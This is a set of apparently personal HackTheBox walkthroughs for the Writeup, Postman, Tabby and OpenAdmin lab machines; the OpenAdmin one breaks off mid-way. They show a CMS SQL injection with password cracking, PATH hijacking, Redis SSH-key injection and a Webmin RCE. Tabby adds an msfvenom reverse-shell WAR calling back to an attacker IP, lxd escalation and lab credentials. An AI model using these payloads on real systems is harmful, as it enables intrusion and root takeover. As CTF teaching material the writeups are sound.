8 | - binary-hijacking-privesc
9 | - B2R
10 | aliases:
11 | - 10.10.10.138
12 | ---
13 | # Writeup [Easy]
14 |
15 | 
16 |
17 | ***
18 |
19 | ### Improved ability:
20 |
21 | - CVE Research
22 | - Source code review
23 | - PATH based privilege escalation
24 |
25 | ### Used tools:
26 |
27 | - nmap
28 | - searchsploit
29 | - pspy64
30 |
31 | ***
32 |
33 |
34 |
35 | ## Introduction & Foothold:
36 |
37 | Let's start with a common full **nmap** scan on the box:
38 |
39 | ```bash
40 | $ nmap -A 10.10.10.138
41 | ```
42 |
43 | ![[attachments/1.png]]
44 |
45 | The only available ports are **port 22** (with _OpenSSH 7.4p1_) and **port 80**, running _Apache httpd 2.4.25_.
46 | Because this version of OpenSSH doesn't have known vulnerabilities, let's analyse the root and the `/writeup/` folder (listed in _robots.txt_) with a web browser.
47 |
48 | Once inside the root, we are greeted with an old-school floppy-disk background and a notice saying that, because the site was attacked, a **DoS protection** has been implemented that can potentially block us from performing brute-force enumeration.
49 |
50 | ![[attachments/2.png]]
51 |
52 | Let's move on and analyse the `/writeup/` folder:
53 |
54 | ![[attachments/3.png]]
55 |
56 | Here we can find some old writeups, but nothing very useful.
57 | However, looking at the **source code**, we are able to find the first important information: the **CMS type**.
58 |
59 | ![[attachments/4.png]]
60 |
61 | Now that we know our target uses **CMS Made Simple**, we can search online for public exploits.
62 | Through **searchsploit** we quickly found the right script to compromise our target:
63 |
64 | ```bash
65 | $ searchsploit 'cms made simple'
66 | --------------------------------------------------------------------------------------------------------------------
67 | Exploit Title | Path
68 | ---------------------------------------------------------------------------------------------------------------------
69 | CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | exploits/php/remote/46627.rb
70 | CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | exploits/php/webapps/26217.html
71 | CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26298.txt
72 | CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | exploits/php/webapps/29272.txt
73 | ...
74 | CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
75 | ```
76 |
77 |
78 |
79 | ## Gaining access as jkr
80 |
81 | Analysing every record, notice how the **SQL injection exploit** (_46635_) is valid for every version below 2.2.10.
82 | Download and execute the script!
83 |
84 | ```bash
85 | $ searchsploi -m 46635
86 | $ python 46635.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlist/rockyou.txt
87 | [+] Salt for password found: 5a599ef579066807
88 | [+] Username found: jkr
89 | [+] Email found: jkr@writeup.htb
90 | [+] Password found: 62def4866937f08cc13bab43bb14e6f7
91 | [+] Password cracked: raykayjay9
92 | ```
93 |
94 | Good! We have the user password. Now we can log into the box as **jkr** and proceed to the privilege escalation phase.
95 |
96 | ```bash
97 | $ ssh jkr@10.10.10.138
98 | $ cat /home/jkr/user.txt
99 | d4e493fd4068af...
100 | ```
101 |
102 |
103 |
104 | ## Privilege Escalation
105 |
106 | After looking for a long time for passwords, misconfigurations or other forms of escalation, I decided to take a closer look at every process running on the machine, so I downloaded **pspy** and launched it.
107 |
108 | ![[attachments/5.png]]
109 |
110 | After a while, my attention was caught by these few lines:
111 |
112 | ```bash
113 | 2019/10/11 10:35:58 CMD: UID=0 PID=2279 | sshd: [accepted]
114 | 2019/10/11 10:35:58 CMD: UID=102 PID=2280 | sshd: [net]
115 | 2019/10/11 10:36:00 CMD: UID=0 PID=2281 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
116 | 2019/10/11 10:36:00 CMD: UID=0 PID=2282 | run-parts --lsbsysinit /etc/update-motd.d
117 | 2019/10/11 10:36:00 CMD: UID=0 PID=2283 | /bin/sh /etc/update-motd.d/10-uname
118 | 2019/10/11 10:36:00 CMD: UID=0 PID=2284 | /bin/sh /etc/update-motd.d/10-uname
119 | 2019/10/11 10:36:00 CMD: UID=0 PID=2285 | sshd: jkr [priv]
120 | ```
121 |
122 | It seems that every time someone logs in, the `/etc/update-motd.d/10-uname` script is executed.
123 | The contents of the script are the following:
124 |
125 | ```bash
126 | jkr@writeup:/etc/update-motd.d$ cat 10-uname
127 | #!/bin/sh
128 | uname -rnsom
129 | jkr@writeup:/etc/update-motd.d$ uname -rnsom
130 | Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
131 | ```
132 |
133 | It is clear that the script executes `uname` without specifying a path, so the binary is looked up in the directories listed in the **$PATH** variable.
134 |
135 | If we are able to write inside one of the directories contained in $PATH that is searched before the one holding the original uname binary, _we can run arbitrary code as root and execute our escalation_ (that's because the `10-uname` process runs with *UID=0*, so it runs as root).
136 |
137 | $PATH contains the following directories:
138 |
139 | ```bash
140 | jkr@writeup:/home/jkr$ ls -l -d /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin
141 | drwxr-xr-x 2 root root 4096 Apr 19 04:24 /bin
142 | drwxr-xr-x 2 root root 4096 Apr 19 04:14 /sbin
143 | drwxr-xr-x 2 root root 20480 Apr 24 13:13 /usr/bin
144 | drwx-wsr-x 2 root staff 20480 Jul 10 17:27 /usr/local/bin
145 | drwx-wsr-x 2 root staff 12288 Jul 10 17:23 /usr/local/sbin
146 | drwxr-xr-x 2 root root 4096 Apr 19 07:31 /usr/sbin
147 | ```
148 |
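149 | Two of them (`/usr/local/bin` and `/usr/local/sbin`) allow *staff* group users to write into them, and they are the first two entries of the PATH set for the root process in the pspy output above.
150 |
151 | Because jkr is part of the staff group, we are able to create a custom script named *uname* that will be executed in place of the original binary once someone logs in. Keeping the directories of a PATH used by root writable by root only (or calling `uname` by its absolute path in the script) would close this.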
152 |
153 | ```bash
154 | jkr@writeup:/etc/update-motd.d$ echo "cat /root/root.txt" > /usr/local/sbin/uname
155 | jkr@writeup:/etc/update-motd.d$ chmod +x /usr/local/sbin/uname
156 | jkr@writeup:/etc/update-motd.d$ exit
157 | root@0xbro:~/Documents/CTF/HTB/Writeup# ssh jkr@10.10.10.138
158 | jkr@10.10.10.138's password:
159 | eeba47f60b48ef92...
160 |
161 | The programs included with the Devuan GNU/Linux system are free software;
162 | the exact distribution terms for each program are described in the
163 | individual files in /usr/share/doc/*/copyright.
164 |
165 | Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
166 | permitted by applicable law.
167 | Last login: Wed Jul 10 17:35:19 2019 from 10.10.15.117
168 | jkr@writeup:~$
169 | ```
170 |
171 | Once this escalation has been found, it is possible to get a reverse shell as root rather than performing other actions as superuser.
172 |
173 | Author: 0x*bro*
174 | [](http://creativecommons.org/licenses/by-nc/4.0/)
175 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
176 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/Postman.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags: HackTheBox Easy Linux redis ssh-keys-cracking webmin miniserv lateral-movement RCE CVE-2019-12840 B2R
3 | Alias: Postman - 10.10.10.160
4 | ---
5 | # Postman [Easy]
6 |
7 | 
8 |
9 | ***
10 |
11 | ### Improved ability:
12 |
13 | - Redis exploitation
14 | - SSH keys cracking
15 | - Webmin exploitation
16 |
17 | ### Used tools:
18 |
19 | - nmap
20 | - LinEnum.sh
21 | - ssh2john
22 | - john
23 | - metasploit
24 |
25 | ***
26 |
27 | ## Introduction & Foothold
28 |
29 | As always, let's start scanning the box with **nmap**
30 |
31 | ```bash
32 | $ nmap -sV -O -A -p 1-10000 --script=banner -o nmap.txt 10.10.10.160
33 | # Nmap 7.80 scan initiated Wed Feb 26 21:38:20 2020 as: nmap -sV -O -A -p 1-10000 --script=banner -o nmap.txt 10.10.10.160
34 | Nmap scan report for 10.10.10.160
35 | Host is up (0.047s latency).
36 | Not shown: 9996 closed ports
37 | PORT STATE SERVICE VERSION
38 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
39 | |_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
40 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.29 (Ubuntu)
42 | 6379/tcp open redis Redis key-value store 4.0.9
43 | 10000/tcp open http MiniServ 1.910 (Webmin httpd)
44 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
45 | TCP/IP fingerprint:
46 | OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=38345%PV=Y%DS=2%DC=T%G=Y%TM=5E56D77
47 | OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS
48 | OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
49 | OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
50 | OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
51 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
52 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
53 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
54 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
55 | OS:=S)
56 |
57 | Network Distance: 2 hops
58 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
59 |
60 | TRACEROUTE (using port 110/tcp)
61 | HOP RTT ADDRESS
62 | 1 46.46 ms 10.10.14.1
63 | 2 46.53 ms 10.10.10.160
64 |
65 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
66 | # Nmap done at Wed Feb 26 21:39:17 2020 -- 1 IP address (1 host up) scanned in 57.09 seconds
67 | ```
68 |
69 | We can notice the presence of four open ports: SSH on port 22, two web servers on ports 80 and 10000, and a **Redis** daemon on port 6379.
70 |
71 | Enumerating the two web services, we discovered that multiple authenticated exploits exist for this specific version of **MiniServ**... they could come in handy later.
72 |
73 | About Redis, we can enumerate the service through some **NSE scripts**, however without getting anything useful except the specific Linux box version (_Linux 4.15.0-58-generic x86_64_)
74 |
75 | ```bash
76 | $ nmap --script redis-info -sV -p 6379 10.10.10.160
77 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 22:20 CET
78 | Nmap scan report for 10.10.10.160
79 | Host is up (0.047s latency).
80 |
81 | PORT STATE SERVICE VERSION
82 | 6379/tcp open redis Redis key-value store 4.0.9 (64 bits)
83 | | redis-info:
84 | | Version: 4.0.9
85 | | Operating System: Linux 4.15.0-58-generic x86_64
86 | | Architecture: 64 bits
87 | | Process ID: 608
88 | | Used CPU (sys): 81.29
89 | | Used CPU (user): 27.25
90 | | Connected clients: 2
91 | | Connected slaves: 0
92 | | Used memory: 840.94K
93 | | Role: master
94 | | Bind addresses:
95 | | 0.0.0.0
96 | | ::1
97 | | Client connections:
98 | | 10.10.14.12
99 | |_ 10.10.14.27
100 | ```
101 |
102 | About [Redis](https://redis.io/documentation):
103 |
104 | > *Redis* is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.
105 |
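106 | In order to work properly, the program needs a specific user who can read and write on physical memory ... in short, a 100% working user.
107 | Because of that, _once we log into the service, we can read and write into the redis user's home directory_, and because we know that the user has a valid shell and a valid home, **we can inject our personal SSH key** in order to gain access through SSH without knowing the right password. On the defensive side, this only works because the instance is reachable from the network (the `redis-info` output above shows it bound to `0.0.0.0`) and the service account has a login shell: binding Redis to localhost, setting `requirepass` and giving the service user no valid shell each break the chain.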
108 |
109 | 
110 |
111 | First, I **generated a new SSH key pair** with the `ssh-keygen` command; next, inside the redis home directory, I **created the `/.ssh` dir and the `authorized_keys` file**, inside of which I wrote my public SSH key.
112 | After those steps, I was finally able to log in as the redis user without actually knowing its password.
113 |
114 | ## Lateral movement to Matt
115 |
116 | As always, upload and run **LinEnum.sh**
117 |
118 | ```bash
119 | redis@Postman:/tmp$ ./LinEnum.sh
120 |
121 | #########################################################
122 | # Local Linux Enumeration & Privilege Escalation Script #
123 | #########################################################
124 | # www.rebootuser.com
125 | # version 0.982
126 |
127 | [-] Debug Info
128 | [+] Thorough tests = Disabled
129 |
130 |
131 | Scan started at:
132 | Thu Feb 27 09:44:23 GMT 2020
133 |
134 |
135 | ### SYSTEM ##############################################
136 | [-] Kernel information:
137 | Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
138 |
139 |
140 | [-] Kernel information (continued):
141 | Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019
142 |
143 |
144 | [-] Specific release information:
145 | DISTRIB_ID=Ubuntu
146 | DISTRIB_RELEASE=18.04
147 | DISTRIB_CODENAME=bionic
148 | DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
149 | NAME="Ubuntu"
150 | VERSION="18.04.3 LTS (Bionic Beaver)"
151 | ID=ubuntu
152 | ID_LIKE=debian
153 | PRETTY_NAME="Ubuntu 18.04.3 LTS"
154 | VERSION_ID="18.04"
155 | HOME_URL="https://www.ubuntu.com/"
156 | SUPPORT_URL="https://help.ubuntu.com/"
157 | BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
158 | PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
159 | VERSION_CODENAME=bionic
160 | UBUNTU_CODENAME=bionic
161 |
162 | [-] Hostname:
163 | Postman
164 |
165 | ...
166 |
167 | [-] Location and Permissions (if accessible) of .bak file(s):
168 | -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak
169 | -rw------- 1 root root 695 Aug 25 2019 /var/backups/group.bak
170 | -rw------- 1 root shadow 577 Aug 25 2019 /var/backups/gshadow.bak
171 | -rw------- 1 root shadow 935 Aug 26 2019 /var/backups/shadow.bak
172 | -rw------- 1 root root 1382 Aug 25 2019 /var/backups/passwd.bak
173 |
174 |
175 | [-] Any interesting mail in /var/mail:
176 | total 8
177 | drwxrwsr-x 2 root mail 4096 Aug 24 2019 .
178 | drwxr-xr-x 13 root root 4096 Aug 25 2019 ..
179 |
180 |
181 | ### SCAN COMPLETE ####################################
182 | ```
183 |
184 | Among the thousands of lines of information returned by the tool, we notice immediately that **there is a publicly readable backup file of an RSA key belonging to Matt**, the user of the machine.
185 | Let's extract it and bring it to our local machine in order to try to crack it.
186 |
187 | In order to crack an SSH key, we first need to generate a hash from it. To achieve this task, we can use **ssh2john**. Next, after having generated the hash, we can crack it using **john**:
188 |
189 | 
190 |
191 | Having gathered the password, we try logging in via SSH as the Matt user ... but it does not work.
192 | Not a problem, because the same password is valid for switching to the Matt user with the **su** command.
193 |
194 | ## Privilege Escalation
195 |
196 | The privilege escalation process can be achieved easily with **Metasploit**.
197 |
198 | During the enumeration phase we found an **authenticated Remote Command Execution exploit** fitting the targeted Webmin version: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/webmin_packageup_rce.md
199 |
200 | > This module exploits an arbitrary command execution vulnerability in **Webmin 1.910** and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
201 |
202 | So let's load the module, fill in the appropriate fields and execute the exploit. What we will get is a shell with root permissions.
203 |
204 | 
205 |
206 | ```
207 | A hacker does for love what others would not do for money.
208 | - Laura Creighton
209 | ```
210 |
211 | Author: 0x*bro*
212 | [](http://creativecommons.org/licenses/by-nc/4.0/)
213 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/Tabby.md:
--------------------------------------------------------------------------------
1 | ---
2 | Tags: HackTheBox Easy Linux LFI WAR tomcat cracking-zip-files lxd-privesc B2R
3 | Alias: Tabby - 10.10.10.194
4 | ---
5 |
6 | # 10.10.10.194 - Tabby [Easy]
7 |
8 | ^780615
9 |
10 | 
11 |
12 | ***
13 |
14 | ### Improved skills:
15 | - LFI
16 | - Tomcat WAR exploitation
17 | - Cracking .zip files
18 | - lxd Privilege Escalation
19 |
20 | ### Used tools:
21 | - nmap
22 | - gobuster
23 | - msfvenom
24 | - LinEnum.sh
25 | - fcrackzip
26 |
27 | ___
28 |
29 |
30 | ## Introduction & Foothold
31 |
32 | **Tabby** is an _easy_ HTB machine focused on the manual exploitation of a **Tomcat** server using a **.WAR** reverse shell and the exploitation of a misconfigured group permission which allows escalating to root by abusing **lxd** rights.
33 |
34 | Let's start as always with an **nmap** scan:
35 |
36 | ```bash
37 | root@kali:~/HackTheBox# nmap -Pn -sCV -p22,80,8080 -oN nmap/Basic_10.10.10.194.nmap 10.10.10.194
38 | PORT STATE SERVICE VERSION
39 | 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
40 | 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.41 (Ubuntu)
42 | |_http-title: Mega Hosting
43 | 8080/tcp open http Apache Tomcat 9.0.31
44 | |_http-open-proxy: Proxy might be redirecting requests
45 | |_http-title: Apache Tomcat
46 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
47 | ```
48 |
49 | We find out that there are three services running on the box, **two of which** are **web servers** (an *Apache httpd 2.4.41* and an *Apache Tomcat 9.0.31*).
50 |
51 | Visiting the first site we discover that the **hostname** of the box is **_megahosting.htb_**. In order to properly enumerate the box we need to resolve it correctly:
52 |
53 | `echo "10.10.10.194 megahosting.htb" >> /etc/hosts`
54 |
55 | Now that we are effectively ready, let's start enumerating every page of the first web server.
56 |
57 | 
58 |
59 | After a few minutes I found the **_http://megahosting.htb/news.php?file=statement_** page, which turns out to be vulnerable to **Local File Inclusion** (LFI).
60 |
61 | 
62 |
63 | 
64 |
65 | Because we got an LFI vulnerability, the logical next step was to try to exploit it in order to get a Remote Code Execution, but unfortunately none of the existing methods worked... so I decided to start to enumerate the second web server (**tomcat**), looking for another entry point.
66 |
67 | ```bash
68 |
69 | root@kali:~/HackTheBox# gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt
70 | ===============================================================
71 | Gobuster v3.0.1
72 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
73 | ===============================================================
74 | [+] Url: http://10.10.10.194:8080/
75 | [+] Threads: 10
76 | [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
77 | [+] Status codes: 200,204,301,302,307,401,403
78 | [+] User Agent: gobuster/3.0.1
79 | [+] Extensions: php,html,txt
80 | [+] Timeout: 10s
81 | ===============================================================
82 | 2020/06/22 16:05:04 Starting gobuster
83 | ===============================================================
84 | /index.html (Status: 200)
85 | /docs (Status: 302)
86 | /examples (Status: 302)
87 | /manager (Status: 302)
88 | ```
89 |
90 | Among all the various directories, *__/manager__* immediately caught my attention: when trying to log in, the server reveals which file contains the credentials, allowing us to use the **LFI** to get them.
91 |
92 | 
93 |
94 | Finding ***tomcat-users.xml*** was a pain as the installation of the web server was done *without following standard paths and rules*; however, after a couple of hours I was able to read the file, located in ***/usr/share/tomcat9/etc/tomcat-users.xml***
95 |
96 | 
97 |
98 | 
99 |
100 | Good! Now we are able to log into the ***/manager*** directory and proceed.
101 |
102 | Since the tomcat user is assigned the roles of **admin-gui** and **manager-script**, it has permission to access the *host-manager webapp via web gui* (from which nothing can be done) but also to interact ***via cli with the manager webapp***, which allows us to upload **.war files** to the server (see the [official documentation](https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html)).
103 |
104 | Once we have found the way, let's **create our reverse shell** through **msfvenom**
105 |
106 | ```bash
107 | root@kali:/var/www/html# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.18 LPORT=9876 -f war > maoutis.war
108 | Payload size: 1095 bytes
109 | Final size of war file: 1095 bytes
110 |
111 | root@kali:/var/www/html# ls -al maoutis.war
112 | -rw-r--r-- 1 root root 1095 Jun 29 19:08 maoutis.war
113 | ```
114 |
115 | load it on the server
116 |
117 | ```bash
118 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' -T maoutis.war 'http://10.10.10.194:8080/manager/text/deploy?path=/maoutis'
119 | OK - Deployed application at context path [/maoutis]
120 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
121 | OK - Listed applications for virtual host [localhost]
122 | /:running:0:ROOT
123 | /maoutis:running:0:maoutis
124 | /examples:running:0:/usr/share/tomcat9-examples/examples
125 | /host-manager:running:1:/usr/share/tomcat9-admin/host-manager
126 | /manager:running:0:/usr/share/tomcat9-admin/manager
127 | /docs:running:0:/usr/share/tomcat9-docs/docs
128 | ```
129 | and run it to get access as *tomcat* user.
130 |
131 | ```bash
132 | root@kali:~/HackTheBox/Machine/Tabby/files# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/maoutis/
133 | ```
134 |
135 | ```bash
136 | root@kali:~# nc -lvp 9876
137 | python3 -c 'import pty; pty.spawn("/bin/bash")'
138 | tomcat@tabby:/var/lib/tomcat9$ export TERM=screen
139 | CTRL+Z
140 | root@kali:~/HackTheBox# stty raw -echo
141 | root@kali:~/HackTheBox# fg
142 |
143 | tomcat@tabby:/var/lib/tomcat9$
144 | ```
145 |
146 |
147 |
148 | ## Lateral Movement to ash
149 |
150 | Once the shell is gained, further enumeration reveals that the user of the box is **ash**.
151 |
152 | Running **LinEnum.sh** we discovered a **.zip backup file** inside ***/var/www/html/files/*** which needs to be cracked in order to be unzipped. Let's use **fcrackzip** in order to crack the archive.
153 |
154 | ```bash
155 | root@kali:~/HackTheBox/Machine/Tabby/files# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip
156 |
157 | PASSWORD FOUND!!!!: pw == admin@it
158 | ```
159 |
160 | Password found! While inside the archive we didn't find anything useful, trying to use the password to switch to **ash** reveals that the same *password has been reused*.
161 |
162 | ```bash
163 | tomcat@tabby:/var/www/html/files$ su ash
164 | Password: admin@it
165 | ash@tabby:/var/www/html/files$
166 | uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
167 | ```
168 |
169 | Well done! We are ash!
170 |
171 |
172 |
173 | ## Privilege Escalation
174 |
175 | Running **LinEnum.sh** again reveals that we are members of the **lxd group** and that there is a way to ***abuse this permission*** in order *to become root*.
176 | Searching on Google I found [this](https://www.hackingarticles.in/lxd-privilege-escalation/) article, which describes how an account on the system that is a member of the lxd group is able to escalate to root privileges by exploiting the features of LXD. In practice, membership of the lxd group should be treated as root-equivalent and granted as carefully as sudo rights.
177 |
178 | 1. **Download** the **lxd-alpine-builder** locally on the kali machine and build it as root
179 |
180 | ```bash
181 | $git clone https://github.com/saghul/lxd-alpine-builder.git
182 | $cd lxd-alpine-builder
183 | $sudo bash build-alpine
184 | ```
185 |
186 | Errors like *"tar: Ignoring unknow ... "* will probably appear. Don't worry and continue with the privilege escalation process.
187 |
188 | 2. **Upload** the **.tar** file on the **ash home** directory and **import** it **inside lxc**
189 |
190 | 
191 |
192 | Once finished, we will be root!
193 |
194 |
195 |
196 | ## Trophy
197 |
198 | > If you can't give me poetry, can't you give me poetical science?
199 | > \- Ada Lovelace
200 |
201 |
202 |
203 | ## License
204 |
205 | Author: 0x*bro*
206 |
207 |
208 | This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/OpenAdmin.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - Linux
6 | - code-review
7 | - lateral-movement
8 | - port-forwarding
9 | - ssh-keys-cracking
10 | - GTFObins
11 | - OpenNetAdmin
12 | - nano-privesc
13 | - command-injection
14 | - RCE
15 | - password-reuse
16 | - hardcoded-credentials
17 | - B2R
18 | aliases:
19 | - 10.10.10.171
20 | ---
21 |
22 | # 10.10.10.171 - OpenAdmin [Easy]
23 |
24 | 
25 |
26 | ---
27 |
28 | ### Improved skills:
29 |
30 | - Enumeration
31 | - Apache configuration review
32 | - Code review
33 | - Lateral movement
34 | - Port Forwarding
35 | - SSH keys cracking
36 | - nano privilege escalation (GTFO)
37 |
38 | ### Used tools:
39 |
40 | - nmap
41 | - dirbuster
42 | - searchsploit
43 | - metasploit
44 | - pspy64
45 | - SwitchyOmega
46 | - ssh2john
47 | - john
48 |
49 | ***
50 |
51 |
52 |
53 | ## Introduction & Foothold
54 |
55 | Let's start as every time with an **nmap** scan:
56 |
57 | ```bash
58 | root@kali:~/Documents/CTF/Machine/OpenAdmin# nmap -sV -A -O 10.10.10.171
59 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 11:28 CET
60 | Nmap scan report for 10.10.10.171
61 | Host is up (0.060s latency).
62 | Not shown: 998 closed ports
63 | PORT STATE SERVICE VERSION
64 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65 | | ssh-hostkey:
66 | | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
67 | | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
68 | |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
69 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
70 | |_http-server-header: Apache/2.4.29 (Ubuntu)
71 | |_http-title: Apache2 Ubuntu Default Page: It works
72 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
73 | TCP/IP fingerprint:
74 | OS:SCAN(V=7.80%E=4%D=2/11%OT=22%CT=1%CU=31767%PV=Y%DS=2%DC=T%G=Y%TM=5E4281D
75 | OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
76 | OS:(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
77 | OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
78 | OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
79 | OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
80 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
81 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
82 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
83 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
84 |
85 | Network Distance: 2 hops
86 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
87 |
88 | TRACEROUTE (using port 1720/tcp)
89 | HOP RTT ADDRESS
90 | 1 61.58 ms 10.10.14.1
91 | 2 61.83 ms 10.10.10.171
92 |
93 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
94 | Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds
95 | ```
96 |
97 | We can see that only two services are exposed: a non-vulnerable SSH version, and an Apache web server on port 80 with a default page.
98 |
99 | In order to enumerate all the possible sub-pages of the site and find an entry point, let's start a **Dirbuster** scan.
100 | Among the first results of the tool execution we find these records:
101 |
102 | `/`
103 | `/index.php`
104 | `/icons/`
105 | `/music/`
106 | `/ona/`
107 |
108 | Visiting each page, once we arrive at http://10.10.10.171/ona/ we realize that we have in front of us a **vulnerable version of OpenNetAdmin**, a web application for network administration.
109 | Let's use **searchsploit** to find out if there are exploits fitting this particular version... the [47772](https://www.exploit-db.com/exploits/47772) seems to be what we need, a **Command Injection** on **OpenNetAdmin 18.1.1**. We just have to download it, import it into **metasploit**, set the correct parameters and run it.
110 |
111 |
112 | ## Lateral movement to Jimmy
113 |
114 | Analyzing the contents of the `/etc/passwd` file we notice that the main users on the box are actually two: **Jimmy** and **Joanna**.
115 |
116 | After having taken a look at the machine and launching _LinEnum.sh_ without success, I decided to check the processes of the machine more closely via **pspy64**.
117 |
118 | 
119 |
120 | By observing the various processes, one particular line attracts my attention:
121 |
